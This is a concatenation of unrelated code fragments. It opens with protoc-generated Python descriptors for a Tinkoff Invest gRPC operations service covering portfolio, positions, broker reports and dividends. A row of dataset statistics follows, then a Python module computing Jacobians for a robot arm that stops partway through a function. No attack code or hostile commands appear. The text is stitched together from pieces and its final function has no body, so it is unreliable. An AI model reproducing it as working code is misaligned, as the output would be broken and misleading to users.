_WITHDRAWLIMITSRESPONSE.fields_by_name['blocked'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_WITHDRAWLIMITSRESPONSE.fields_by_name['blocked_guarantee'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['quantity'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_PORTFOLIOPOSITION.fields_by_name['average_position_price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['expected_yield'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_PORTFOLIOPOSITION.fields_by_name['current_nkd'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['average_position_price_pt'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_PORTFOLIOPOSITION.fields_by_name['current_price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['average_position_price_fifo'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['quantity_lots'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_BROKERREPORTREQUEST.fields_by_name['generate_broker_report_request'].message_type = _GENERATEBROKERREPORTREQUEST
_BROKERREPORTREQUEST.fields_by_name['get_broker_report_request'].message_type = _GETBROKERREPORTREQUEST
# oneof wiring: each member field is appended to its oneof's field list and
# told which oneof contains it (BrokerReportRequest.payload here).
_BROKERREPORTREQUEST.oneofs_by_name['payload'].fields.append(
  _BROKERREPORTREQUEST.fields_by_name['generate_broker_report_request'])
_BROKERREPORTREQUEST.fields_by_name['generate_broker_report_request'].containing_oneof = _BROKERREPORTREQUEST.oneofs_by_name['payload']
_BROKERREPORTREQUEST.oneofs_by_name['payload'].fields.append(
  _BROKERREPORTREQUEST.fields_by_name['get_broker_report_request'])
_BROKERREPORTREQUEST.fields_by_name['get_broker_report_request'].containing_oneof = _BROKERREPORTREQUEST.oneofs_by_name['payload']
_BROKERREPORTRESPONSE.fields_by_name['generate_broker_report_response'].message_type = _GENERATEBROKERREPORTRESPONSE
_BROKERREPORTRESPONSE.fields_by_name['get_broker_report_response'].message_type = _GETBROKERREPORTRESPONSE
_BROKERREPORTRESPONSE.oneofs_by_name['payload'].fields.append(
  _BROKERREPORTRESPONSE.fields_by_name['generate_broker_report_response'])
_BROKERREPORTRESPONSE.fields_by_name['generate_broker_report_response'].containing_oneof = _BROKERREPORTRESPONSE.oneofs_by_name['payload']
_BROKERREPORTRESPONSE.oneofs_by_name['payload'].fields.append(
  _BROKERREPORTRESPONSE.fields_by_name['get_broker_report_response'])
_BROKERREPORTRESPONSE.fields_by_name['get_broker_report_response'].containing_oneof = _BROKERREPORTRESPONSE.oneofs_by_name['payload']
_GENERATEBROKERREPORTREQUEST.fields_by_name['from'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GENERATEBROKERREPORTREQUEST.fields_by_name['to'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETBROKERREPORTRESPONSE.fields_by_name['broker_report'].message_type = _BROKERREPORT
_BROKERREPORT.fields_by_name['trade_datetime'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_BROKERREPORT.fields_by_name['price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['order_amount'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['aci_value'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_BROKERREPORT.fields_by_name['total_order_amount'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['broker_commission'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['exchange_commission'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['exchange_clearing_commission'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['repo_rate'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_BROKERREPORT.fields_by_name['clear_value_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_BROKERREPORT.fields_by_name['sec_value_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['generate_div_foreign_issuer_report'].message_type = _GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['get_div_foreign_issuer_report'].message_type = _GETDIVIDENDSFOREIGNISSUERREPORTREQUEST
_GETDIVIDENDSFOREIGNISSUERREQUEST.oneofs_by_name['payload'].fields.append(
  _GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['generate_div_foreign_issuer_report'])
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['generate_div_foreign_issuer_report'].containing_oneof = _GETDIVIDENDSFOREIGNISSUERREQUEST.oneofs_by_name['payload']
_GETDIVIDENDSFOREIGNISSUERREQUEST.oneofs_by_name['payload'].fields.append(
  _GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['get_div_foreign_issuer_report'])
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['get_div_foreign_issuer_report'].containing_oneof = _GETDIVIDENDSFOREIGNISSUERREQUEST.oneofs_by_name['payload']
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['generate_div_foreign_issuer_report_response'].message_type = _GENERATEDIVIDENDSFOREIGNISSUERREPORTRESPONSE
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['div_foreign_issuer_report'].message_type = _GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE
_GETDIVIDENDSFOREIGNISSUERRESPONSE.oneofs_by_name['payload'].fields.append(
  _GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['generate_div_foreign_issuer_report_response'])
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['generate_div_foreign_issuer_report_response'].containing_oneof = _GETDIVIDENDSFOREIGNISSUERRESPONSE.oneofs_by_name['payload']
_GETDIVIDENDSFOREIGNISSUERRESPONSE.oneofs_by_name['payload'].fields.append(
  _GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['div_foreign_issuer_report'])
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['div_foreign_issuer_report'].containing_oneof = _GETDIVIDENDSFOREIGNISSUERRESPONSE.oneofs_by_name['payload']
_GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST.fields_by_name['from'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST.fields_by_name['to'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE.fields_by_name['dividends_foreign_issuer_report'].message_type = _DIVIDENDSFOREIGNISSUERREPORT
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['record_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['payment_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['dividend'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['external_commission'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['dividend_gross'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['tax'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['dividend_amount'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
# Expose every generated message and enum type by proto name on the file
# descriptor, then register the whole file with the default symbol database
# so other generated modules can resolve these types by name.
DESCRIPTOR.message_types_by_name['OperationsRequest'] = _OPERATIONSREQUEST
DESCRIPTOR.message_types_by_name['OperationsResponse'] = _OPERATIONSRESPONSE
DESCRIPTOR.message_types_by_name['Operation'] = _OPERATION
DESCRIPTOR.message_types_by_name['OperationTrade'] = _OPERATIONTRADE
DESCRIPTOR.message_types_by_name['PortfolioRequest'] = _PORTFOLIOREQUEST
DESCRIPTOR.message_types_by_name['PortfolioResponse'] = _PORTFOLIORESPONSE
DESCRIPTOR.message_types_by_name['PositionsRequest'] = _POSITIONSREQUEST
DESCRIPTOR.message_types_by_name['PositionsResponse'] = _POSITIONSRESPONSE
DESCRIPTOR.message_types_by_name['WithdrawLimitsRequest'] = _WITHDRAWLIMITSREQUEST
DESCRIPTOR.message_types_by_name['WithdrawLimitsResponse'] = _WITHDRAWLIMITSRESPONSE
DESCRIPTOR.message_types_by_name['PortfolioPosition'] = _PORTFOLIOPOSITION
DESCRIPTOR.message_types_by_name['PositionsSecurities'] = _POSITIONSSECURITIES
DESCRIPTOR.message_types_by_name['PositionsFutures'] = _POSITIONSFUTURES
DESCRIPTOR.message_types_by_name['BrokerReportRequest'] = _BROKERREPORTREQUEST
DESCRIPTOR.message_types_by_name['BrokerReportResponse'] = _BROKERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['GenerateBrokerReportRequest'] = _GENERATEBROKERREPORTREQUEST
DESCRIPTOR.message_types_by_name['GenerateBrokerReportResponse'] = _GENERATEBROKERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['GetBrokerReportRequest'] = _GETBROKERREPORTREQUEST
DESCRIPTOR.message_types_by_name['GetBrokerReportResponse'] = _GETBROKERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['BrokerReport'] = _BROKERREPORT
DESCRIPTOR.message_types_by_name['GetDividendsForeignIssuerRequest'] = _GETDIVIDENDSFOREIGNISSUERREQUEST
DESCRIPTOR.message_types_by_name['GetDividendsForeignIssuerResponse'] = _GETDIVIDENDSFOREIGNISSUERRESPONSE
DESCRIPTOR.message_types_by_name['GenerateDividendsForeignIssuerReportRequest'] = _GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST
DESCRIPTOR.message_types_by_name['GetDividendsForeignIssuerReportRequest'] = _GETDIVIDENDSFOREIGNISSUERREPORTREQUEST
DESCRIPTOR.message_types_by_name['GenerateDividendsForeignIssuerReportResponse'] = _GENERATEDIVIDENDSFOREIGNISSUERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['GetDividendsForeignIssuerReportResponse'] = _GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['DividendsForeignIssuerReport'] = _DIVIDENDSFOREIGNISSUERREPORT
DESCRIPTOR.enum_types_by_name['OperationState'] = _OPERATIONSTATE
DESCRIPTOR.enum_types_by_name['OperationType'] = _OPERATIONTYPE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Build the concrete Python message classes from their descriptors via the
# reflection API (one class per message defined in the .proto file) and
# register each with the symbol database.  The @@protoc_insertion_point
# markers are kept for protoc plugins.
OperationsRequest = _reflection.GeneratedProtocolMessageType('OperationsRequest', (_message.Message,), {
  'DESCRIPTOR' : _OPERATIONSREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.OperationsRequest)
  })
_sym_db.RegisterMessage(OperationsRequest)
OperationsResponse = _reflection.GeneratedProtocolMessageType('OperationsResponse', (_message.Message,), {
  'DESCRIPTOR' : _OPERATIONSRESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.OperationsResponse)
  })
_sym_db.RegisterMessage(OperationsResponse)
Operation = _reflection.GeneratedProtocolMessageType('Operation', (_message.Message,), {
  'DESCRIPTOR' : _OPERATION,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.Operation)
  })
_sym_db.RegisterMessage(Operation)
OperationTrade = _reflection.GeneratedProtocolMessageType('OperationTrade', (_message.Message,), {
  'DESCRIPTOR' : _OPERATIONTRADE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.OperationTrade)
  })
_sym_db.RegisterMessage(OperationTrade)
PortfolioRequest = _reflection.GeneratedProtocolMessageType('PortfolioRequest', (_message.Message,), {
  'DESCRIPTOR' : _PORTFOLIOREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PortfolioRequest)
  })
_sym_db.RegisterMessage(PortfolioRequest)
PortfolioResponse = _reflection.GeneratedProtocolMessageType('PortfolioResponse', (_message.Message,), {
  'DESCRIPTOR' : _PORTFOLIORESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PortfolioResponse)
  })
_sym_db.RegisterMessage(PortfolioResponse)
PositionsRequest = _reflection.GeneratedProtocolMessageType('PositionsRequest', (_message.Message,), {
  'DESCRIPTOR' : _POSITIONSREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PositionsRequest)
  })
_sym_db.RegisterMessage(PositionsRequest)
PositionsResponse = _reflection.GeneratedProtocolMessageType('PositionsResponse', (_message.Message,), {
  'DESCRIPTOR' : _POSITIONSRESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PositionsResponse)
  })
_sym_db.RegisterMessage(PositionsResponse)
WithdrawLimitsRequest = _reflection.GeneratedProtocolMessageType('WithdrawLimitsRequest', (_message.Message,), {
  'DESCRIPTOR' : _WITHDRAWLIMITSREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.WithdrawLimitsRequest)
  })
_sym_db.RegisterMessage(WithdrawLimitsRequest)
WithdrawLimitsResponse = _reflection.GeneratedProtocolMessageType('WithdrawLimitsResponse', (_message.Message,), {
  'DESCRIPTOR' : _WITHDRAWLIMITSRESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse)
  })
_sym_db.RegisterMessage(WithdrawLimitsResponse)
PortfolioPosition = _reflection.GeneratedProtocolMessageType('PortfolioPosition', (_message.Message,), {
  'DESCRIPTOR' : _PORTFOLIOPOSITION,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PortfolioPosition)
  })
_sym_db.RegisterMessage(PortfolioPosition)
PositionsSecurities = _reflection.GeneratedProtocolMessageType('PositionsSecurities', (_message.Message,), {
  'DESCRIPTOR' : _POSITIONSSECURITIES,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PositionsSecurities)
  })
_sym_db.RegisterMessage(PositionsSecurities)
PositionsFutures = _reflection.GeneratedProtocolMessageType('PositionsFutures', (_message.Message,), {
  'DESCRIPTOR' : _POSITIONSFUTURES,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PositionsFutures)
  })
_sym_db.RegisterMessage(PositionsFutures)
BrokerReportRequest = _reflection.GeneratedProtocolMessageType('BrokerReportRequest', (_message.Message,), {
  'DESCRIPTOR' : _BROKERREPORTREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.BrokerReportRequest)
  })
_sym_db.RegisterMessage(BrokerReportRequest)
BrokerReportResponse = _reflection.GeneratedProtocolMessageType('BrokerReportResponse', (_message.Message,), {
  'DESCRIPTOR' : _BROKERREPORTRESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.BrokerReportResponse)
  })
_sym_db.RegisterMessage(BrokerReportResponse)
GenerateBrokerReportRequest = _reflection.GeneratedProtocolMessageType('GenerateBrokerReportRequest', (_message.Message,), {
  'DESCRIPTOR' : _GENERATEBROKERREPORTREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequest)
  })
_sym_db.RegisterMessage(GenerateBrokerReportRequest)
GenerateBrokerReportResponse = _reflection.GeneratedProtocolMessageType('GenerateBrokerReportResponse', (_message.Message,), {
  'DESCRIPTOR' : _GENERATEBROKERREPORTRESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GenerateBrokerReportResponse)
  })
_sym_db.RegisterMessage(GenerateBrokerReportResponse)
GetBrokerReportRequest = _reflection.GeneratedProtocolMessageType('GetBrokerReportRequest', (_message.Message,), {
  'DESCRIPTOR' : _GETBROKERREPORTREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetBrokerReportRequest)
  })
_sym_db.RegisterMessage(GetBrokerReportRequest)
GetBrokerReportResponse = _reflection.GeneratedProtocolMessageType('GetBrokerReportResponse', (_message.Message,), {
  'DESCRIPTOR' : _GETBROKERREPORTRESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetBrokerReportResponse)
  })
_sym_db.RegisterMessage(GetBrokerReportResponse)
BrokerReport = _reflection.GeneratedProtocolMessageType('BrokerReport', (_message.Message,), {
  'DESCRIPTOR' : _BROKERREPORT,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.BrokerReport)
  })
_sym_db.RegisterMessage(BrokerReport)
GetDividendsForeignIssuerRequest = _reflection.GeneratedProtocolMessageType('GetDividendsForeignIssuerRequest', (_message.Message,), {
  'DESCRIPTOR' : _GETDIVIDENDSFOREIGNISSUERREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest)
  })
_sym_db.RegisterMessage(GetDividendsForeignIssuerRequest)
GetDividendsForeignIssuerResponse = _reflection.GeneratedProtocolMessageType('GetDividendsForeignIssuerResponse', (_message.Message,), {
  'DESCRIPTOR' : _GETDIVIDENDSFOREIGNISSUERRESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse)
  })
_sym_db.RegisterMessage(GetDividendsForeignIssuerResponse)
GenerateDividendsForeignIssuerReportRequest = _reflection.GeneratedProtocolMessageType('GenerateDividendsForeignIssuerReportRequest', (_message.Message,), {
  'DESCRIPTOR' : _GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest)
  })
_sym_db.RegisterMessage(GenerateDividendsForeignIssuerReportRequest)
GetDividendsForeignIssuerReportRequest = _reflection.GeneratedProtocolMessageType('GetDividendsForeignIssuerReportRequest', (_message.Message,), {
  'DESCRIPTOR' : _GETDIVIDENDSFOREIGNISSUERREPORTREQUEST,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequest)
  })
_sym_db.RegisterMessage(GetDividendsForeignIssuerReportRequest)
GenerateDividendsForeignIssuerReportResponse = _reflection.GeneratedProtocolMessageType('GenerateDividendsForeignIssuerReportResponse', (_message.Message,), {
  'DESCRIPTOR' : _GENERATEDIVIDENDSFOREIGNISSUERREPORTRESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportResponse)
  })
_sym_db.RegisterMessage(GenerateDividendsForeignIssuerReportResponse)
GetDividendsForeignIssuerReportResponse = _reflection.GeneratedProtocolMessageType('GetDividendsForeignIssuerReportResponse', (_message.Message,), {
  'DESCRIPTOR' : _GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse)
  })
_sym_db.RegisterMessage(GetDividendsForeignIssuerReportResponse)
DividendsForeignIssuerReport = _reflection.GeneratedProtocolMessageType('DividendsForeignIssuerReport', (_message.Message,), {
  'DESCRIPTOR' : _DIVIDENDSFOREIGNISSUERREPORT,
  '__module__' : 'tinkoff.invest.grpc.operations_pb2'
  # @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport)
  })
_sym_db.RegisterMessage(DividendsForeignIssuerReport)
DESCRIPTOR._options = None
# Service descriptor for OperationsService: six unary RPC methods, each
# pairing a request message descriptor with its response descriptor.
# serialized_start/serialized_end index into the serialized file descriptor.
_OPERATIONSSERVICE = _descriptor.ServiceDescriptor(
  name='OperationsService',
  full_name='tinkoff.public.invest.api.contract.v1.OperationsService',
  file=DESCRIPTOR,
  index=0,
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_start=8643,
  serialized_end=9526,
  methods=[
  _descriptor.MethodDescriptor(
    name='GetOperations',
    full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetOperations',
    index=0,
    containing_service=None,
    input_type=_OPERATIONSREQUEST,
    output_type=_OPERATIONSRESPONSE,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
  _descriptor.MethodDescriptor(
    name='GetPortfolio',
    full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetPortfolio',
    index=1,
    containing_service=None,
    input_type=_PORTFOLIOREQUEST,
    output_type=_PORTFOLIORESPONSE,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
  _descriptor.MethodDescriptor(
    name='GetPositions',
    full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetPositions',
    index=2,
    containing_service=None,
    input_type=_POSITIONSREQUEST,
    output_type=_POSITIONSRESPONSE,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
  _descriptor.MethodDescriptor(
    name='GetWithdrawLimits',
    full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetWithdrawLimits',
    index=3,
    containing_service=None,
    input_type=_WITHDRAWLIMITSREQUEST,
    output_type=_WITHDRAWLIMITSRESPONSE,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
  _descriptor.MethodDescriptor(
    name='GetBrokerReport',
    full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetBrokerReport',
    index=4,
    containing_service=None,
    input_type=_BROKERREPORTREQUEST,
    output_type=_BROKERREPORTRESPONSE,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
  _descriptor.MethodDescriptor(
    name='GetDividendsForeignIssuer',
    full_name='tinkoff.public.invest.api.contract.v1.OperationsService.GetDividendsForeignIssuer',
    index=5,
    containing_service=None,
    input_type=_GETDIVIDENDSFOREIGNISSUERREQUEST,
    output_type=_GETDIVIDENDSFOREIGNISSUERRESPONSE,
    serialized_options=None,
    create_key=_descriptor._internal_create_key,
  ),
])
_sym_db.RegisterServiceDescriptor(_OPERATIONSSERVICE)
DESCRIPTOR.services_by_name['OperationsService'] = _OPERATIONSSERVICE
# @@protoc_insertion_point(module_scope)
| 53.90303
| 13,727
| 0.784646
| 15,433
| 124,516
| 5.98892
| 0.039331
| 0.039469
| 0.074621
| 0.061649
| 0.801184
| 0.769407
| 0.761347
| 0.738994
| 0.725751
| 0.665174
| 0
| 0.036028
| 0.102991
| 124,516
| 2,309
| 13,728
| 53.926375
| 0.791489
| 0.023571
| 0
| 0.688073
| 1
| 0.061927
| 0.250222
| 0.220307
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003211
| 0
| 0.003211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2efa57d8190d2ec52b42f4fba02abe7d34eb9492
| 37,555
|
py
|
Python
|
misc/baxter/src_py_no_class/Jos.py
|
YoshimitsuMatsutaIe/rmp_test
|
a7c94ff68b518ef51821484795c308c2c8519c4c
|
[
"MIT"
] | null | null | null |
misc/baxter/src_py_no_class/Jos.py
|
YoshimitsuMatsutaIe/rmp_test
|
a7c94ff68b518ef51821484795c308c2c8519c4c
|
[
"MIT"
] | null | null | null |
misc/baxter/src_py_no_class/Jos.py
|
YoshimitsuMatsutaIe/rmp_test
|
a7c94ff68b518ef51821484795c308c2c8519c4c
|
[
"MIT"
] | null | null | null |
import numpy as np
from math import cos as c
from math import sin as s
from math import tan as ta
from math import sqrt as sq
def jo_W0(q):
    """Return the 3x7 Jacobian of the W0 frame origin: identically zero.

    The W0 origin is fixed, so no joint angle in q moves it.
    """
    zero_row = [0, 0, 0, 0, 0, 0, 0]
    return np.array([list(zero_row) for _ in range(3)])
def jo_BR(q):
    """Return the 3x7 Jacobian of the BR frame origin: identically zero.

    The BR origin does not depend on any joint angle, so every partial
    derivative vanishes.
    """
    return np.array([[0] * 7, [0] * 7, [0] * 7])
def jo_0(q):
    """Return the 3x7 Jacobian of joint-origin 0: identically zero.

    Origin 0 sits before the first actuated joint, so q has no effect on it.
    """
    rows = []
    for _ in range(3):
        rows.append([0, 0, 0, 0, 0, 0, 0])
    return np.array(rows)
def jo_1(q):
    """Return the 3x7 Jacobian of joint-origin 1.

    Only the first joint angle q[0, 0] appears: column 0 carries the x/y
    partials, every other entry is zero.  q is indexed as a column vector
    (q[i, 0]); assumed 7x1 -- only index 0 is read here.
    """
    k = 0.0487903679018718  # geometric constant from the arm kinematics
    s0 = s(q[0, 0])
    c0 = c(q[0, 0])
    return np.array([
        [k * s0 + k * c0, 0, 0, 0, 0, 0, 0],
        [k * s0 - k * c0, 0, 0, 0, 0, 0, 0],
        [0, 0, 0, 0, 0, 0, 0],
    ])
def jo_2(q):
    """Return the 3x7 Jacobian of joint-origin 2.

    Depends on the first two joint angles (q[0, 0], q[1, 0]); columns 2-6
    are zero.  The subexpressions are named but evaluated in the same order
    as the original generated closed form, so the floating-point result is
    bit-identical.
    """
    a = 0.257634355725319   # geometric constant from the arm kinematics
    k = 0.0487903679018718  # geometric constant from the arm kinematics
    s0, c0 = s(q[0, 0]), c(q[0, 0])
    s1, c1 = s(q[1, 0]), c(q[1, 0])
    return np.array([
        [(a * s0 + a * c0) * c1 + k * s0 + k * c0,
         -(a * s0 - a * c0) * s1, 0, 0, 0, 0, 0],
        [(a * s0 - a * c0) * c1 + k * s0 - k * c0,
         -(-a * s0 - a * c0) * s1, 0, 0, 0, 0, 0],
        [0, -0.36435 * c1, 0, 0, 0, 0, 0],
    ])
def jo_3(q):
    """Return the 3x7 Jacobian of joint-origin 3.

    Only the first three joint angles (q[0, 0], q[1, 0], q[2, 0]) appear in
    the expression; columns 3-6 are zero.  q is indexed as a column vector
    (q[i, 0]); assumed 7x1 -- TODO confirm against callers.  The closed form
    looks machine-generated (presumably exported from a CAS) and is kept
    verbatim to avoid perturbing the floating-point result.
    """
